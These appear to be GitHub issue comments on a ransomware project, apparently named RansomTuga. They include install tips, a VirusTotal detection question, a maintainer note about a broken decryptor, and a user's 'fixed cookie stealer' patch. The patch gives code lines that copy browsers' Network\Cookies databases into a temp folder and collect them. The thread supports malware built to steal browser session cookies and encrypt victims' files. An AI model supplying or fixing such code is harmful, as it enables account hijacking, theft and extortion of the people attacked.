Tuga
Tuga
or try `pip install pypiwin32`
`pip install pypiwin32`
Same problem here... I've been working on it for a few days but still nothing, unfortunately...
Fixed cookie stealer for newer browser versions: Added to line 113: `file2tmp(f"{browser}\\Network\\Cookies", tmp_dir, f"{app}_NetCookies.sql")` Modified line 279: `self.cookies_dbs = {file for file in listdir(self.tmp_dir) if (file.endswith("_Cookies.sql") or file.endswith("_NetCookies.sql"))}` Modified line...
did you upload it to virustotal?
Explain more, like what's the error and so on
This feature is already present [here](https://github.com/Tugamer89/RansomTuga/blob/84bccdda62dadab3fce1b5fd523dc61036040b63/commons/common.h#L54C3-L54C3). However, at the moment the decryptor does not work if this function is enabled, I will try to fix it as soon as possible